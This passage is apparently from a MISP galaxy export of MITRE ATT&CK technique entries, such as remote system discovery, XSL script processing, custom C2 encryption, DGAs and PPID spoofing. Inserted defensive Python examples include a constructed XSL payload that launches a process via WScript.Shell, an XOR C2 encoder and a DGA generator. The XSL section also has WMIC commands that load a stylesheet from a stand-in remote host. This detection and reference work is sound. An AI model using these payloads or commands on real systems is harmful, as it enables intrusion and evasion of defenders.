Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"

Table 5803. Table References

Links

https://attack.mitre.org/techniques/T1018

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

https://www.us-cert.gov/ncas/alerts/TA18-106A

Indirect Command Execution - T1202

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)

Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"

Table 5804. Table References

Links

https://attack.mitre.org/techniques/T1202

https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe

https://twitter.com/Evi1cg/status/935027922397573120

https://twitter.com/vector_sec/status/896049052642533376

XSL Script Processing - T1220

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft command line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is itself valid XML, the adversary may pass the same XSL file as both arguments. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)

  • <code>msxsl.exe customers[.]xml script[.]xsl</code>

  • <code>msxsl.exe script[.]xsl script[.]xsl</code>

  • <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)

  • Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>

  • Remote File: <code>wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"</code>
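Because both msxsl.exe and the WMIC /FORMAT loader ignore the file extension, a defensive check has to look at the bytes rather than the name. The following is an added example (not code from the MISP galaxy, ATT&CK, or the cited posts) that parses a candidate file as XML and reports any <code>msxsl:script</code> block it would execute; both stylesheets in it are constructed for the example.

```python
"""Scan a file's bytes, not its name, for msxsl-style embedded script.

Added example for this section; it is not code from the MISP galaxy, ATT&CK
or the cited posts. msxsl.exe and `wmic /FORMAT:` both run the JScript or
VBScript found in an <msxsl:script> element (namespace
urn:schemas-microsoft-com:xslt) and neither cares about the file extension,
so a content check is what catches script.jpeg. Both stylesheets below are
constructed for this example.
"""
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
# Strings that appear when embedded script reaches out to COM for execution.
COM_MARKERS = ("ActiveXObject", "WScript.Shell", "Shell.Application", "CreateObject")

# Constructed: an ordinary stylesheet with templates only.
BENIGN_XSL = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <html><body><xsl:value-of select="customers/customer/name"/></body></html>
  </xsl:template>
</xsl:stylesheet>"""

# Constructed: a Squiblytwo-style stylesheet as it would be saved under script.jpeg.
SCRIPT_XSL = b"""<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
  <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
  ]]>
  </ms:script>
</stylesheet>"""


def embedded_scripts(data: bytes) -> list[dict]:
    """Return one record per <msxsl:script> element in a well-formed XML document.

    A document that does not parse is returned as empty: the loaders reject it
    as well, so it cannot carry this payload.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []
    records = []
    for el in root.iter(f"{{{MSXSL_NS}}}script"):
        records.append({
            # msxsl:script falls back to JScript when no language is given.
            "language": el.get("language", "JScript"),
            "prefix": el.get("implements-prefix", ""),
            "body": (el.text or "").strip(),
        })
    return records


def is_stylesheet(data: bytes) -> bool:
    """True if the root element is an XSLT stylesheet/transform, whatever the extension."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    return root.tag in (f"{{{XSLT_NS}}}stylesheet", f"{{{XSLT_NS}}}transform")


def assess(data: bytes) -> dict:
    """Summarise what a stylesheet would execute if fed to msxsl.exe or wmic /FORMAT:."""
    scripts = embedded_scripts(data)
    markers = sorted({m for s in scripts for m in COM_MARKERS if m in s["body"]})
    return {
        "is_stylesheet": is_stylesheet(data),
        "script_blocks": len(scripts),
        "languages": sorted({s["language"] for s in scripts}),
        "com_markers": markers,
        "suspicious": bool(scripts),   # any embedded script is worth a look
    }


if __name__ == "__main__":
    for name, blob in (("benign.xsl", BENIGN_XSL), ("script.jpeg", SCRIPT_XSL)):
        print(name, assess(blob))
```

Run it over anything a user-writable directory or a mail attachment store contains, regardless of extension; a file that is a stylesheet with a script block is rare enough in ordinary environments that every hit deserves a look, and the COM markers separate a scripted template from one that launches a shell.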

The tag is: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220"

Table 5805. Table References

Links

https://attack.mitre.org/techniques/T1220

https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/

https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

https://twitter.com/dez_/status/986614411711442944

https://www.microsoft.com/download/details.aspx?id=21714

Standard Cryptographic Protocol - T1032

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032"

Table 5806. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1032

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Derive intelligence requirements - T1230

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).

Leadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)

The tag is: misp-galaxy:mitre-attack-pattern="Derive intelligence requirements - T1230"

Table 5807. Table References

Links

https://attack.mitre.org/techniques/T1230

Custom Cryptographic Protocol - T1024

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.

Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.

Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)
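The weakness of a fixed XOR key is easy to demonstrate. The following added example (not code from the MISP galaxy or the cited reports) constructs a repeating-key XOR encoder as the implant side, then recovers the key from a capture using only a guess about the first bytes of the beacon and a printability check; the key and beacon are invented sample data.

```python
"""Recover a fixed XOR key from captured C2 traffic with a known-plaintext crib.

Added example for this section, not code from the MISP galaxy or the cited
reports. The implant side is a constructed repeating-key XOR encoder, the
weak scheme the text describes; the analyst side gets back the key from a
guess about how the beacon starts (here a JSON prefix) plus a printability
check that picks the key length. The key and beacon are invented sample data.
"""
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Constructed: what the implant would embed in its config (unknown to the analyst).
SECRET_KEY = b"\x8f\x13\xa7"
BEACON = b'{"host":"WS-042","user":"jdoe","cmd":"whoami /all","sleep":60}'
# Constructed: the bytes seen on the wire.
CAPTURED = xor_bytes(BEACON, SECRET_KEY)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace."""
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / max(len(data), 1)


def recover_key(ciphertext: bytes, crib: bytes, max_len: int = 32):
    """Return (key, plaintext) for the shortest key length that explains the crib.

    For a candidate length L the crib XORed with the first L ciphertext bytes
    is the key guess; because a fixed key never changes, that guess must also
    turn the rest of the message into text, which is the acceptance test.
    Returns None if no length up to min(len(crib), max_len) works, which is
    what a wrong crib produces.
    """
    for length in range(1, min(len(crib), max_len) + 1):
        key = xor_bytes(ciphertext[:length], crib[:length])
        plaintext = xor_bytes(ciphertext, key)
        if printable_ratio(plaintext) == 1.0:
            return key, plaintext
    return None


def decrypt_session(messages, crib: bytes):
    """Recover the key from the first message and apply it to the whole session."""
    found = recover_key(messages[0], crib)
    if found is None:
        return None
    key, _ = found
    return [xor_bytes(m, key) for m in messages]


if __name__ == "__main__":
    result = recover_key(CAPTURED, b'{"host":"')
    print("key:", result[0].hex(), "\nplaintext:", result[1].decode())
```

The crib need only be as long as the key period; once one message yields the key, every other message in the capture decrypts with it, which is exactly why a fixed key embedded in the sample or its configuration offers no real protection. Binary protocols need a different acceptance test than printability (a magic value or length field), but the key-recovery step is the same.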

The tag is: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024"

Table 5808. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1024

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Domain Generation Algorithms - T1520

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.
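As an added example (a constructed generator, not the algorithm of any named family, and not code from the MISP galaxy), the block below shows both sides of the technique: a date-seeded DGA the implant would run, the defender's enumeration of the same domains once the seed and algorithm are recovered from a sample, and the burst of NXDOMAIN answers a resolver log shows while the implant searches for the one registered domain. The DNS log lines are constructed sample data.

```python
"""A date-seeded DGA, the defender's pre-computation, and an NXDOMAIN-burst check.

Added example for this section; the generator is constructed for
illustration and is not the algorithm of any named malware family. The
implant derives the day's candidate domains from a seed and the date, so the
operator can register any one of them ahead of time; an analyst who has
recovered the seed and algorithm from a sample can enumerate the same domains
in advance, and DNS logs show the tell-tale burst of failed lookups while the
implant hunts for the registered one. The DNS log lines are constructed.
"""
import hashlib
from datetime import date, timedelta

TLDS = ("com", "net", "org", "info")


def dga_domains(day: date, seed: bytes = b"example-seed", count: int = 50) -> list[str]:
    """Deterministically derive `count` domains for `day` from `seed`."""
    state = hashlib.sha256(seed + day.isoformat().encode()).digest()
    domains = []
    for i in range(count):
        state = hashlib.sha256(state + i.to_bytes(2, "big")).digest()
        length = 8 + state[0] % 8                       # labels of 8..15 letters
        label = "".join(chr(97 + b % 26) for b in state[1:1 + length])
        domains.append(f"{label}.{TLDS[state[-1] % len(TLDS)]}")
    return domains


def sinkhole_list(seed: bytes, start: date, days: int, count: int = 50) -> list[str]:
    """Defender view: every domain the implant will try in the coming window."""
    found = set()
    for offset in range(days):
        found.update(dga_domains(start + timedelta(days=offset), seed, count))
    return sorted(found)


def build_sample_log(day: date = date(2024, 1, 1)) -> str:
    """Constructed resolver log: `timestamp client qname rcode`, one query per line."""
    lines = [f"{day}T09:00:00 10.0.0.5 www.example.com NOERROR",
             f"{day}T09:00:01 10.0.0.5 typo.exmaple.com NXDOMAIN"]
    for n, qname in enumerate(dga_domains(day)[:8]):
        lines.append(f"{day}T09:00:{2 + n:02d} 10.0.0.7 {qname} NXDOMAIN")
    lines.append(f"{day}T09:00:10 10.0.0.7 {dga_domains(day)[8]} NOERROR")  # the live one
    return "\n".join(lines)


def nxdomain_bursts(log: str, threshold: int = 5) -> dict[str, list[str]]:
    """Clients with at least `threshold` NXDOMAIN answers, with the names they tried."""
    failures: dict[str, list[str]] = {}
    for line in log.splitlines():
        _ts, client, qname, rcode = line.split()
        if rcode == "NXDOMAIN":
            failures.setdefault(client, []).append(qname)
    return {c: names for c, names in failures.items() if len(names) >= threshold}


def known_dga_hits(log: str, seed: bytes, day: date) -> dict[str, list[str]]:
    """Match queried names against the pre-computed list for that day."""
    expected = set(dga_domains(day, seed))
    hits: dict[str, list[str]] = {}
    for line in log.splitlines():
        _ts, client, qname, _rcode = line.split()
        if qname in expected:
            hits.setdefault(client, []).append(qname)
    return hits


if __name__ == "__main__":
    today = date(2024, 1, 1)
    print("first domains:", dga_domains(today)[:3])
    print("bursts:", nxdomain_bursts(build_sample_log(today)))
```

The NXDOMAIN count is the generic signal and needs no knowledge of the algorithm; the pre-computed list is the precise one and is what makes sinkholing or pre-registration possible. Real families vary the seed source (date, a value fetched from a public service, a hard-coded constant) and the alphabet, but the defender's workflow of reversing the generator and enumerating ahead of time is unchanged.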

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520"

Table 5809. Table References

Links

https://attack.mitre.org/techniques/T1520

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

Parent PID Spoofing - T1502

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell or [Rundll32](https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1502"

Table 5810. Table References

Links

https://attack.mitre.org/techniques/T1502

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

https://blog.xpnsec.com/becoming-system/

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Reflective Code Loading - T1620

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, rather than creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snippets of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)

Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620"

Table 5811. Table References

Links

https://0x00sec.org/t/super-stealthy-droppers/3715

https://attack.mitre.org/techniques/T1620

https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html

https://thewover.github.io/Introducing-Donut/

https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/

https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/

https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/

Rogue Domain Controller - T1207

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207"

Table 5812. Table References

Links

https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html

https://adsecurity.org/?page_id=1821

https://attack.mitre.org/techniques/T1207

https://github.com/shellster/DCSYNCMonitor

https://msdn.microsoft.com/en-us/library/ms677626.aspx

https://www.dcshadow.com/

Software Deployment Tools - T1072

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform its intended purpose.

The tag is: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072"

Table 5813. Table References

Links

https://attack.mitre.org/techniques/T1072

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

System Information Discovery - T1082

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virtual Machine API)

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"

Table 5814. Table References

Links

https://attack.mitre.org/techniques/T1082

https://cloud.google.com/compute/docs/reference/rest/v1/instances

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

https://www.us-cert.gov/ncas/alerts/TA18-106A

Windows Remote Management - T1028

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028"

Table 5815. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

https://attack.mitre.org/techniques/T1028

https://capec.mitre.org/data/definitions/555.html

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

Commonly Used Port - T1043

This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as

  • TCP:80 (HTTP)

  • TCP:443 (HTTPS)

  • TCP:25 (SMTP)

  • TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are

  • TCP/UDP:135 (RPC)

  • TCP:22 (SSH)

  • TCP/UDP:3389 (RDP)

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"

Table 5816. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1043

Private whois services - T1305

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).

Every domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Private whois services - T1305"

Table 5817. Table References

Links

https://attack.mitre.org/techniques/T1305

Security Software Discovery - T1063

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Windows

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.

Mac

It’s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063"

Table 5818. Table References

Links

https://attack.mitre.org/techniques/T1063

Test physical access - T1360

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).

An adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)

The tag is: misp-galaxy:mitre-attack-pattern="Test physical access - T1360"

Table 5819. Table References

Links

https://attack.mitre.org/techniques/T1360

Exploit TEE Vulnerability - T1405

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405"

Table 5820. Table References

Links

http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html

https://attack.mitre.org/techniques/T1405

https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://usmile.at/symposium/program/2015/ekberg

https://usmile.at/symposium/program/2015/thomas-holmes

Account Access Removal - T1640

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts.

The tag is: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1640"

Table 5821. Table References

Links

https://attack.mitre.org/techniques/T1640

Network Service Discovery - T1046

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use an mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046"

Table 5822. Table References

Links

https://attack.mitre.org/techniques/T1046

https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html

https://themittenmac.com/what-does-apt-activity-look-like-on-macos/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

Proxy Through Victim - T1604

